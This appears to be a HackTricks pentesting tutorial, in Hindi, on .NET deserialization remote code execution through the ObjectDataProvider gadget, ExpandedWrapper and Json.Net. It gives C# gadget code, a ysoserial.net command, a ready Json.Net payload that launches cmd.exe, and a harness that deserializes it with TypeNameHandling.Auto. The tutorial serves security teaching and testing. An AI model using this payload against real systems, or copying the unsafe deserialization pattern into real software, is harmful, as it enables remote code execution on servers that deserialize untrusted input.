hacktricks/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md

# बेसिक .Net डिसीरियलाइज़ेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।**

</details>

इस पोस्ट का उद्देश्य है **समझना कि ObjectDataProvider गैजेट कैसे उपयोग किया जाता है** ताकि RCE प्राप्त किया जा सके और **Serialization पुस्तकालय Json.Net और xmlSerializer का दुरुपयोग कैसे किया जा सकता है** उस गैजेट के साथ।

## ObjectDataProvider गैजेट

दस्तावेज़ीकरण से: _ObjectDataProvider कक्षा एक ऑब्जेक्ट को लपेटती है और बाइंडिंग स्रोत के रूप में उपयोग करने के लिए एक ऑब्जेक्ट बनाती है_।\
हाँ, यह एक अजीब समझ है, इसलिए चलो देखते हैं कि इस कक्षा में क्या है जो इतना दिलचस्प है: यह कक्षा एक विषम ऑब्जेक्ट को **लपेटने की अनुमति देती है**, _**MethodParameters**_ का उपयोग करके **विषम पैरामीटर सेट करने** के लिए और फिर **MethodName का उपयोग करके विषम ऑब्जेक्ट के विषम फ़ंक्शन को कॉल करने के लिए**।\
इसलिए, विषम **ऑब्जेक्ट** डिसीरियलाइज़ होते समय एक **फ़ंक्शन** को **पैरामीटर के साथ निष्पादित** करेगा।

### **यह कैसे संभव है**

ObjectDataProvider को **System.Windows.Data** नामक नेमस्पेस में परिभाषित और लागू किया गया है, जो **PresentationFramework.dll** में स्थित है (_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF_).

[**dnSpy**](https://github.com/0xd4d/dnSpy) का उपयोग करके आप इंटरेस्टेड कक्षा के कोड की **जांच** कर सकते हैं। नीचे दी गई छवि में हम **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name** के कोड को देख रहे हैं

![](<../../.gitbook/assets/image (299).png>)

जैसा कि आप देख सकते हैं जब `MethodName` सेट होता है तो `base.Refresh()` को कॉल किया जाता है, चलो देखते हैं कि यह क्या करता है:

![](<../../.gitbook/assets/image (300).png>)

ठीक है, चलो देखते हैं कि `this.BeginQuery()` क्या करता है। `BeginQuery` को `ObjectDataProvider` द्वारा ओवरराइड किया गया है और यह क्या करता है:

![](<../../.gitbook/assets/image (301).png>)

कोड के अंत में ध्यान दें कि यह `this.QueryWorke(null)` को कॉल कर रहा है। चलो देखते हैं कि यह क्या निष्पादित करता है:

![](<../../.gitbook/assets/image (302) (1).png>)

ध्यान दें कि यह फ़ंक्शन `QueryWorker` का पूरा कोड नहीं है लेकिन यह इसका दिलचस्प हिस्सा दिखा रहा है: कोड **`this.InvokeMethodOnInstance(out ex);` को कॉल करता है** यह वह लाइन है जहां **सेट किया गया मेथड निष्पादित** होता है।

यदि आप यह सत्यापित करना चाहते हैं कि _**MethodName**_ सेट करने पर यह निष्पादित होगा, तो आप इस कोड को चला सकते हैं:
```java
using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}
```
नोट करें कि आपको `System.Windows.Data` लोड करने के लिए _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ को संदर्भ में जोड़ना होगा।

## ExpandedWrapper

पिछले उत्पादन का उपयोग करके ऐसे मामलों में होगा जहां **ऑब्जेक्ट** को **_ObjectDataProvider_** के रूप में **डिसीरियलाइज़ किया जाएगा** (उदाहरण के लिए DotNetNuke vuln में, XmlSerializer का उपयोग करके ऑब्जेक्ट को `GetType` का उपयोग करके डिसीरियलाइज़ किया गया था)। फिर, _ObjectDataProvider_ इंस्टेंस में **छिपे ऑब्जेक्ट के प्रकार के बारे में कोई ज्ञान नहीं होगा** (`Process` उदाहरण के लिए)। आप यहां [DotNetNuke vuln के बारे में अधिक जानकारी देख सकते हैं](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1)।

यह कक्षा एक दिए गए इंस्टेंस में छिपे ऑब्जेक्टों के ऑब्जेक्ट प्रकार को निर्दिष्ट करने की अनुमति देती है। इसलिए, इस कक्षा का उपयोग एक स्रोत ऑब्जेक्ट (_ObjectDataProvider_) को एक नए ऑब्जेक्ट प्रकार में छिपाने और हमें आवश्यक गुण (_ObjectDataProvider.MethodName_ और _ObjectDataProvider.MethodParameters_) प्रदान करने के लिए किया जा सकता है।\
यह पहले प्रस्तुत किए गए मामलों के लिए बहुत उपयोगी होता है, क्योंकि हम **_ObjectDataProvider_** को **_ExpandedWrapper_** इंस्टेंस के भीतर **छिपा सकते हैं** और जब डिसीरियलाइज़ किया जाएगा तो यह कक्षा _**MethodName**_ में निर्दिष्ट **कार्य** को **निष्पादित** करने वाला _**OjectDataProvider**_ ऑब्जेक्ट बनाएगी।

आप निम्नलिखित कोड के साथ इस व्रैपर की जांच कर सकते हैं:
```java
using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}
```
## Json.Net

[आधिकारिक वेब पेज](https://www.newtonsoft.com/json) में इसका उल्लेख किया गया है कि यह पुस्तकालय **Json.NET के शक्तिशाली JSON सीरियलाइज़र के साथ किसी भी .NET ऑब्जेक्ट को सीरियलाइज़ और डीसीरियलाइज़ करने की अनुमति देती है**। इसलिए, यदि हम **ObjectDataProvider गैजेट को डीसीरियलाइज़ कर सकें**, तो हम एक ऑब्जेक्ट को डीसीरियलाइज़ करके एक **RCE** का कारण कर सकते हैं।

### Json.Net उदाहरण

सबसे पहले चलिए देखते हैं कि इस पुस्तकालय का उपयोग करके एक ऑब्जेक्ट को **सीरियलाइज़/डीसीरियलाइज़** कैसे किया जाता है:
```java
using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}
```
### Json.Net का दुरुपयोग

[ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करके मैंने एक अपशिष्ट बनाया है:
```java
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
इस कोड में आप **एक्सप्लॉइट का परीक्षण कर सकते हैं**, इसे चलाएं और आप देखेंगे कि एक कैल्क चलाया जाता है:
```java
using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें या **Twitter** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।

</details>